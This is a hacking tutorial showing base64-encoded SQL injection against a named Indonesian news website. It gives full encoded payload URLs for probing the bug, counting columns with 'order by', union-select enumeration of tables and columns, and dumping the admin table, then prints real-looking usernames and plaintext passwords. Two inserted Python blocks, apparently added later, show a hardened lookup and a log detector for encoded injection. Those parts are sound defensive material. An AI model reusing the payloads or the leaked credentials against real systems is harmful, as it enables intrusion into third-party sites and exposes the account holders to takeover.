SQL injection in a URL with base64 encoding

This time I'll discuss SQL injection in a URL whose parameter is encoded with base64.
Base64 is
Tool: hex and base64 converter (download)
Our target this time is a website that uses base64-encoded URL parameters:
http://radar-bogor.co.id/?kanalid=MTQ=
Using base64 in the URL is one of the tricks admins use to confuse newbies, and very few people use base64.
Here I take one Indonesian website as a sample:
http://radar-bogor.co.id/?kanalid=MTQ=
Let's test whether this site has a SQLi bug:
http://radar-bogor.co.id/?kanalid=MTQn
An error appears:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/t91653/sites/radar-bogor.co.id/www/body_kanal.php on line 11

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sloki/user/t91653/sites/radar-bogor.co.id/www/body_kanal.php on line 22

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/t91653/sites/radar-bogor.co.id/www/body_kanal.php on line 25

This is because MTQ= was changed to MTQn.
So what is MTQ=?
MTQ= is a base64-encoded value.
Take a look at one of my tools:
MTQ= decodes to 14
MTQn decodes to 14'
Let's check how many fields there are:
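The error appears because the application trusts whatever the base64 decodes to and pastes it into the query. As an added example (not code from the post or from the site), here is a Python sketch of that pattern next to a hardened version that decodes strictly, accepts only a decimal integer, and binds it as a query parameter. The `kanal` table and its rows are an invented stand-in, and sqlite3 replaces MySQL.

```python
import base64
import binascii
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's database (sqlite3 instead of MySQL)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE kanal (id INTEGER PRIMARY KEY, nama TEXT)")
    con.executemany("INSERT INTO kanal VALUES (?, ?)", [(14, "Berita"), (15, "Olahraga")])
    return con


def unsafe_lookup(con, encoded):
    """The pattern the error messages suggest: decode kanalid and paste it into the SQL string."""
    kanal_id = base64.b64decode(encoded).decode("utf-8", "replace")
    return con.execute("SELECT id, nama FROM kanal WHERE id=" + kanal_id).fetchall()


_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_kanal_id(encoded):
    """Decode strictly and accept only a short decimal integer; anything else is rejected."""
    if not _B64.fullmatch(encoded):
        raise ValueError("kanalid is not base64")
    try:
        raw = base64.b64decode(encoded, validate=True)
    except binascii.Error as exc:
        raise ValueError("kanalid is not valid base64") from exc
    # "14" passes; "14'" or "14 order by 1--" fail here, before any SQL is built.
    if not re.fullmatch(rb"[0-9]{1,9}", raw):
        raise ValueError("decoded kanalid is not an integer")
    return int(raw)


def safe_lookup(con, encoded):
    """The validated integer is bound as a parameter; decoded text never reaches the SQL grammar."""
    kanal_id = parse_kanal_id(encoded)
    return con.execute("SELECT id, nama FROM kanal WHERE id=?", (kanal_id,)).fetchall()


def compare(encoded):
    """Run both versions on one encoded value; errors are returned as strings for comparison."""
    out = {}
    for label, fn in (("unsafe", unsafe_lookup), ("safe", safe_lookup)):
        try:
            out[label] = fn(make_db(), encoded)
        except (ValueError, sqlite3.Error) as exc:
            out[label] = f"{type(exc).__name__}: {exc}"
    return out


if __name__ == "__main__":
    for enc in ("MTQ=", "MTQn", "MTQgb3JkZXIgYnkgMS0t"):
        print(enc, compare(enc))
```

With MTQ= both versions return the same row. With MTQn the unsafe version raises a database syntax error (the visible symptom in the warnings above), while the hardened version rejects the input before touching the database; with the "order by" payload the unsafe version silently accepts the injected clause and the hardened version again rejects it.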
http://radar-bogor.co.id/?kanalid=MTQgb3JkZXIgYnkgMS0t
MTQgb3JkZXIgYnkgMS0t decodes to: 14 order by 1-- = true

http://radar-bogor.co.id/?kanalid=MTQgb3JkZXIgYnkgNS0t
MTQgb3JkZXIgYnkgNS0t decodes to: 14 order by 5-- = true

http://radar-bogor.co.id/?kanalid=MTQgb3JkZXIgYnkgOC0t
MTQgb3JkZXIgYnkgOC0t decodes to: 14 order by 8-- = false

At the 8th field an error appears,
so this website has only 7 fields.
Let's dig out its contents:
-14 union all select 1,2,3,4,5,6,7--
http://radar-bogor.co.id/?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSwyLDMsNCw1LDYsNy0t

Field 2 is displayed.
Let's extract the table names:
-14 union all select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables--
Encoded:
http://radar-bogor.co.id/?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyw0LDUsNiw3IGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcy0t

The website's tables are shown:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,escevents,forum_post,forum_postext,forum_smile,forum_topic,tbl_article,tbl_article_comment,tbl_banner,tbl_category,tbl_contact,tbl_gallery,tbl_gallery_cat,tbl_iklan,tbl_iklan_cat,tbl_marquee,tbl_member,tbl_nl_archives,tbl_nl_config,tbl_nl_email,tbl_nl_listsconfig,tbl_nl_sub,tbl_nl_temp,tbl_polling,tbl_polling_answer,tbl_sms,tbl_sms_cat,tbl_upload,tbl_user
Let's try to open the columns of the table tbl_user:
-14 union all select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='tbl_user'--
Encoded:
http://radar-bogor.co.id/?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMsNCw1LDYsNyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3RibF91c2VyJy0t

The columns come out:
User_ID,User_Name,User_Password,First_Name,Last_Name,User_email,User_Address,User_Phone,User_HP,User_Status,catuser,Join_Date
Let's extract the contents of the columns User_Name and User_Password from the table tbl_user:
-14 union all select 1,group_concat( User_Name,0x3a,User_Password),3,4,5,6,7 from tbl_user--
http://radar-bogor.co.id/?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSxncm91cF9jb25jYXQoIFVzZXJfTmFtZSwweDNhLFVzZXJfUGFzc3dvcmQpLDMsNCw1LDYsNyBmcm9tIHRibF91c2VyLS0=

Got it:
superadmin:ivan,content:pass,webmaster:punt3n,supervisor:pass,iben:101112,denie:maryana,afandi:422159
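None of the requests above contain the words union, select or a quote character in clear text, so a filter or log search that inspects only the raw URL sees ordinary-looking parameter values. As an added example (not code from the post), the detection logic below parses access-log lines, base64-decodes query parameter values that look like base64, and flags decoded values containing SQL metacharacters or keywords; the log lines are constructed for this example and carry the encoded values from the write-up, with made-up client IPs, timestamps and sizes.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access-log lines (IPs, timestamps and sizes are invented).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2011:10:00:01 +0700] "GET /?kanalid=MTQ= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2011:10:00:07 +0700] "GET /?kanalid=MTQn HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2011:10:00:15 +0700] "GET /?kanalid=MTQgb3JkZXIgYnkgMS0t HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2011:10:00:42 +0700] "GET /?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSwyLDMsNCw1LDYsNy0t HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2011:10:01:00 +0700] "GET /?kanalid=MTU= HTTP/1.1" 200 5098 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{2,}={0,2}$")
# Indicators a legitimate numeric id never contains once decoded.
SQLI_RE = re.compile(
    r"""['"#;]|--|/\*|\b(union|select|order\s+by|information_schema|group_concat)\b""", re.I
)


def try_b64(value):
    """Return the decoded text if value is canonical base64 that decodes to UTF-8, else None."""
    candidate = value.replace(" ", "+")  # parse_qsl turned a literal '+' into ' '
    if not B64_RE.fullmatch(candidate):
        return None
    try:
        raw = base64.b64decode(candidate, validate=True)
    except binascii.Error:
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def scan_log(text):
    """One finding per request whose decoded query value contains a SQL indicator."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for name, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
            decoded = try_b64(value)
            if decoded is None:
                continue
            hit = SQLI_RE.search(decoded)
            if hit:
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "param": name,
                    "encoded": value.replace(" ", "+"),
                    "decoded": decoded, "indicator": hit.group(0),
                })
    return findings


def naive_scan(text):
    """The same indicators applied to the raw request path, without decoding."""
    matches = (REQUEST_RE.match(line) for line in text.splitlines())
    return [m["path"] for m in matches if m and SQLI_RE.search(m["path"])]


if __name__ == "__main__":
    print("raw-path hits:", naive_scan(SAMPLE_LOG))
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['encoded']} -> {f['decoded']!r} [{f['indicator']}]")
```

On the sample log the raw-path scan finds nothing, while the decoding scan flags the quote probe, the "order by" column count and the union query, and leaves the two plain ids (14 and 15) alone. The same decode-then-inspect step applies to any parameter an application accepts in base64, since an encoding is not an access control.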

Thanks to letjen, EA Ngel, cyberlog, rahox, cyber byte, shamus, cybermuttaqin, Agoes_doubleb, thomas_ipt, blackpaper, deepgreat2003, achyx, presiden, wishnu, kiddies, mywisdom and all the crew of whitecyber, jasakom, echo, sekuritionline.

Regards,
k3nz0
